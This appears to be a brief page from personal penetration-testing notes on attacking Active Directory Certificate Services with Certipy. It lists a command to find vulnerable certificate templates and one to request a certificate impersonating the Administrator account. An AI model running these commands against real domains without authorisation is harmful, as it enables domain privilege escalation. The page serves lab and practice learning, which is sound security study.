search
DiscordHackTheBoxTryHackMeGitHub

ADCS

hashtag
Certipy

hashtag
Enumerate CA & Misconfigs

certipy find -u amogus@{DOMAIN} -p password -vulnerable -stdout -debug

hashtag
Requesting a certificate

certipy req -k -no-pass -ca amgs-DC-CA -upn Administrator -target {DOMAIN}

ADCS has a lot of misconfigs, from ESC1 to ESC13. I will add them here as long I would use it on practice at least once

hashtag
RESOURCES

PreviousExtraSIDsNextESC1

Last updated